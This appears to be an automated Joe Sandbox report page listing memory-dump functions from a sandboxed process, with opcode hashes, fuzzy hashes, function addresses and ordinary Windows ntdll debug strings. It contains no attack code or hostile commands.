Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5873963b8fa9de197a9b9094392cad3590228de2b8ec9a6d56d6e4ba31b5fa
Instruction ID: 88db6f38206e748dd4df90ff4662ddeab29c36c86e4a7107cbf4762e1ece6ba3
Opcode Fuzzy Hash: 8e5873963b8fa9de197a9b9094392cad3590228de2b8ec9a6d56d6e4ba31b5fa
Instruction Fuzzy Hash: 9B90027620150402F51071585D48686009E87D4301F95D411A0425558D869489A1A521

Function 059A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5102b6b80380c3c8fdd3404e88df36aebcbc0a620c23b3c7afbbfcaaebca5e4
Instruction ID: f351f71a4459b8bcfe5bae0e1e291737bac5f25d01ffb682a49de596ae504516
Opcode Fuzzy Hash: f5102b6b80380c3c8fdd3404e88df36aebcbc0a620c23b3c7afbbfcaaebca5e4
Instruction Fuzzy Hash: 8590026260550402F1407158595C746006D87D4201F95D011A0025554DC6998B556AA1

Function 059A2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed7728241c17987d195ff0f0e69251054a7c69661d1125373df9295a37a36a9
Instruction ID: c0e062af41056207ce4671c5fb50aba81c09439e4ac9d472e027bbe36e707ead
Opcode Fuzzy Hash: 2ed7728241c17987d195ff0f0e69251054a7c69661d1125373df9295a37a36a9
Instruction Fuzzy Hash: 5590027220150403F10071585A4C747005D87D4201F95D411A0425558DD69689516521

Function 059A2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f54c166221e981ac38f77f82ad6930067f8ad20097b616c2b286ac3032ca046
Instruction ID: a076ca0ffdb0fce452dc0910b16c351b1d904c5afd2867e2914854a68c796912
Opcode Fuzzy Hash: 1f54c166221e981ac38f77f82ad6930067f8ad20097b616c2b286ac3032ca046
Instruction Fuzzy Hash: 3590027220150842F10071584948B86005D87E4301F95C016A0125654D8655C9517921

Function 059A2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07295493df75ee23f7b5cdcf9c45047250f5152d45592b943f7f23144ac8aa6f
Instruction ID: 9806c4b03bf7cad670667f4a06b7187a7d3caa43eec6d7e03bb9eac43d255a7b
Opcode Fuzzy Hash: 07295493df75ee23f7b5cdcf9c45047250f5152d45592b943f7f23144ac8aa6f
Instruction Fuzzy Hash: BB90027220190402F10071584D4C787005D87D4302F95C011A5165555E86A5C9916931

Function 059A2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5d17481a338673bfe05ceaf1d01dee806d0991b854588b9e772419f228a78f
Instruction ID: 7563a6e41856bacbb6d5e55458fa3bc9ff63a908f5d7167cfef8fd011ea90a93
Opcode Fuzzy Hash: 2e5d17481a338673bfe05ceaf1d01dee806d0991b854588b9e772419f228a78f
Instruction Fuzzy Hash: F69002A221150042F10471584948746009D87E5201F95C012A2155554CC5698D615525

Function 059A2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35be00a74f360df2d24eea4a7fde6705f7cf793e2e6b4b9bcf7aa72665aaca98
Instruction ID: b52defe543974e76952cc8154cb03e2a054fbaf8f748f0d9687fe1ff596125a0
Opcode Fuzzy Hash: 35be00a74f360df2d24eea4a7fde6705f7cf793e2e6b4b9bcf7aa72665aaca98
Instruction Fuzzy Hash: 9F9002A220190403F14075584D48647005D87D4302F95C011A2065555E8A698D516535

Function 059A2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70410607faec3ace89a9f469a75c27dc07e592141479996ba4801a6650cffa15
Instruction ID: bb02fc63c5ff4111b347fa39d352b89df682feef9652583a7c008eeae9ddc43e
Opcode Fuzzy Hash: 70410607faec3ace89a9f469a75c27dc07e592141479996ba4801a6650cffa15
Instruction Fuzzy Hash: D490026230150402F10271584958646005DC7D5345FD5C012E1425555D86658A53A532

Function 059A39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caab26d2c5b4c9683e78cd83c7a3488c63aa834e376d76896d002de86758dd25
Instruction ID: 5c0af935509186825fb62a65a3fa744bcf6c28de9ba00467ad89756dc30e3e30
Opcode Fuzzy Hash: caab26d2c5b4c9683e78cd83c7a3488c63aa834e376d76896d002de86758dd25
Instruction Fuzzy Hash: 6390026224555102F150715C4948656405DA7E4201F95C021A0815594D859589556621

Function 059A2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a882f7f2a627be77d8f3600204f6f41843ffb29a1a1d147ea78830d4d56553c
Instruction ID: 07da18463692be8f33c3e4c97f2abea7ef9bf5695c591e7c9f0a3428aef63d3e
Opcode Fuzzy Hash: 1a882f7f2a627be77d8f3600204f6f41843ffb29a1a1d147ea78830d4d56553c
Instruction Fuzzy Hash: 9890027220150802F10471584D486C6005D87D4301F95C011A6025655E96A589917531

Function 059A2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1930e317af384c273585e311121614e1502ee181bbdcef71b009e1ef0222140
Instruction ID: 142abeac79533f8d46bcab00c78747b39b1f7407562a88f743a11a76385cf539
Opcode Fuzzy Hash: e1930e317af384c273585e311121614e1502ee181bbdcef71b009e1ef0222140
Instruction Fuzzy Hash: 1B90027260550802F15071584958786005D87D4301F95C011A0025654D87958B557AA1

Function 059A2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a6ae64edc476f1533b6a47be976ac647bfb7ee855a6443d37378ce42d27cac
Instruction ID: 3f1fc07c9dcb54181fae2cb72979511ce676b5ebf837044ec32f0fda8f8d1bb6
Opcode Fuzzy Hash: 73a6ae64edc476f1533b6a47be976ac647bfb7ee855a6443d37378ce42d27cac
Instruction Fuzzy Hash: DD90027220554842F14071584948A86006D87D4305F95C011A0065694D96658E55BA61

Function 059A2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9372ec685c092cfa46772fe36491d0f2a103045cf1a243ec2466012b613fa65
Instruction ID: 5edf7f864f8bffd9dc32d7b82973921ff4529abce0cfef786da792abc666edde
Opcode Fuzzy Hash: e9372ec685c092cfa46772fe36491d0f2a103045cf1a243ec2466012b613fa65
Instruction Fuzzy Hash: A29002E2201640926500B2588948B4A455D87E4201B95C016E1055560CC56589519535

Function 059A2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a5a8dd32c58693c3a7d057a9cdc66ae8a8b9b7b17ac4aa3aa894acb0b97ffb
Instruction ID: e781cdf27b68ec3576739755d61be04d8826420dbedd5ed3c073a8f9dbb8de83
Opcode Fuzzy Hash: c4a5a8dd32c58693c3a7d057a9cdc66ae8a8b9b7b17ac4aa3aa894acb0b97ffb
Instruction Fuzzy Hash: D3900266221500022145B5580B4854B049D97DA3513D5C015F1417590CC66189655721

Function 059A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: e1d663291f8f3a08a4a7ac03024800eb9cc4c80c932e6f54fc688729f4485cca
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 059A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 059A293C
___swprintf_l.LIBCMT ref: 059A295E
___swprintf_l.LIBCMT ref: 059A29A3
___swprintf_l.LIBCMT ref: 059DA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 059DA527
ffff:, xrefs: 059DA504
::ffff:0:%u.%u.%u.%u, xrefs: 059DA54E
:%u.%u.%u.%u, xrefs: 059DA5B8

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 48fb6c7dea5c9fa07a29b273ee1a5a029c267f1393c1ca04b9af8a09885df871
Instruction ID: d2b982a316fb6a0af3b3368cb156c4426ae592fc5f5b3f5220dae8320463fcbe
Opcode Fuzzy Hash: 48fb6c7dea5c9fa07a29b273ee1a5a029c267f1393c1ca04b9af8a09885df871
Instruction Fuzzy Hash: FD5107BAA04116BFDF20DFA8898497EF7B9BB88240754C529E455D7641D374EE10C7F0

Function 05A12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05A124A6
___swprintf_l.LIBCMT ref: 05A124E2
___swprintf_l.LIBCMT ref: 05A1257D
___swprintf_l.LIBCMT ref: 05A125A3
___swprintf_l.LIBCMT ref: 05A125C8
___swprintf_l.LIBCMT ref: 05A12608

Strings

ffff:, xrefs: 05A1247D, 05A1249D
:%u.%u.%u.%u, xrefs: 05A125FF
::ffff:0:%u.%u.%u.%u, xrefs: 05A124DA
::%hs%u.%u.%u.%u, xrefs: 05A1249E

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e60fe3b1c640d2ef2cd85c79a998867ef444dc47e287be4facab2037d77d82c0
Instruction ID: 922b755a3ad554c1f676daa46b044a19cd1862edcb953706b8089b9d96c50858
Opcode Fuzzy Hash: e60fe3b1c640d2ef2cd85c79a998867ef444dc47e287be4facab2037d77d82c0
Instruction Fuzzy Hash: 0F513D79B00645AFDB30DF5EC990E7FB7FAEF44210B048459E9A6C7641E6B8EA00C764

Function 05997630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 059D4725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 059D4742
CLIENT(ntdll): Processing section info %ws..., xrefs: 059D4787
Execute=1, xrefs: 059D4713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 059D46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 059D4655
ExecuteOptions, xrefs: 059D46A0

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 622db878ebc75d086f3e2a0921c63386a4777e7bf53bf9b8bae3c7dab1e3e2ec
Instruction ID: a24579bb2d97ccda5b5e524f180e484134151ed4d64aaab31ca10a417697976a
Opcode Fuzzy Hash: 622db878ebc75d086f3e2a0921c63386a4777e7bf53bf9b8bae3c7dab1e3e2ec
Instruction Fuzzy Hash: 335116356102597AEF14EBE8DC89FAE77A9FB85300F080499E505AB180EF71AE41CE61

Function 059AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 059AB6BF

Strings

+, xrefs: 059AB65A
0, xrefs: 059AB695
0, xrefs: 059AB66F
-, xrefs: 059AB650

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 5594a98b7727684bba59277a5f8b332c1383e59c6929848df4eb0f8a9267edc4
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: FC81B372E052499EDF25CE68C451BFEBBB7BF85320F184519D891A7691C7749840CBF0

Function 0599BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 059D7BAC
RTL: Resource at %p, xrefs: 059D7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 059D7B7F

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 54b6ce1342f6b854b9cbf0ca45fa7c14fbb4f6dbbf9ff43da412c2d6deb27060
Instruction ID: cc6c2a8f51c68da48a7684b296793a55a2166c1d20c6ecc0c58d630df5bbc27a
Opcode Fuzzy Hash: 54b6ce1342f6b854b9cbf0ca45fa7c14fbb4f6dbbf9ff43da412c2d6deb27060
Instruction Fuzzy Hash: 9741E5317087029FCB24DF29D840F6AB7EAFF88710F100A1DE95A9B680DB75E805CB91

Function 0599B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 059D728C

Strings

RTL: Re-Waiting, xrefs: 059D72C1
RTL: Resource at %p, xrefs: 059D72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 059D7294

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 8d7274c3035ee69dde2b6d7c370a1654d974c5ec3aa6489e7d9360c767fe60a5
Instruction ID: 3cfc84cfa5d3b51f6f95a6cfb66550014b66f8b97543935dfa5448a29e16fed4
Opcode Fuzzy Hash: 8d7274c3035ee69dde2b6d7c370a1654d974c5ec3aa6489e7d9360c767fe60a5
Instruction Fuzzy Hash: F4410271704246ABCB25DF68CC41F6AB7AAFB94710F104A19FA55AB240DB30F842DBE1

Function 05A12300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05A1238D
___swprintf_l.LIBCMT ref: 05A123B3

Strings

%%%u, xrefs: 05A12384
]:%u, xrefs: 05A123AA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 5a25e2fa4554bf8388fffe77f8366aae1c76a111d1463259675aa771fcc9e7aa
Instruction ID: 74a27e0ac22303416e52db1f1f9d59e3fe87508b694f6ee7c08be03d08cf505a
Opcode Fuzzy Hash: 5a25e2fa4554bf8388fffe77f8366aae1c76a111d1463259675aa771fcc9e7aa
Instruction Fuzzy Hash: 08318176A00219AFDB20DF2ACC44FEEB7B8FF44650F444556EC49E3200EB30EA558BA0

Function 059A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 059A7E8B

Strings

-, xrefs: 059A7DDD
+, xrefs: 059A7DE8

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 0092cdab85192e555a71eb772e81b8b867856068f7073d110b79a801401dbc6e
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: E0918872F042169BDF24DF99C886ABEB7AAFF44720F24451AE855E72D0D7309A4187F0

Function 05969126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 05969191
@, xrefs: 05969175

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: cb96d6bff6987e7cbcb26f7a6aae9a80fc2488522ff5d8d5f8df33c5a33c409c
Instruction ID: e22ade53495dee12ad4ecf47fc6a761c5b05aa08f672de8486f0baf417cb0f89
Opcode Fuzzy Hash: cb96d6bff6987e7cbcb26f7a6aae9a80fc2488522ff5d8d5f8df33c5a33c409c
Instruction Fuzzy Hash: DA812B75D002699BDB21DB54CD45BEEBBB8BF48710F1041EAE909B7240E7309E85CFA1

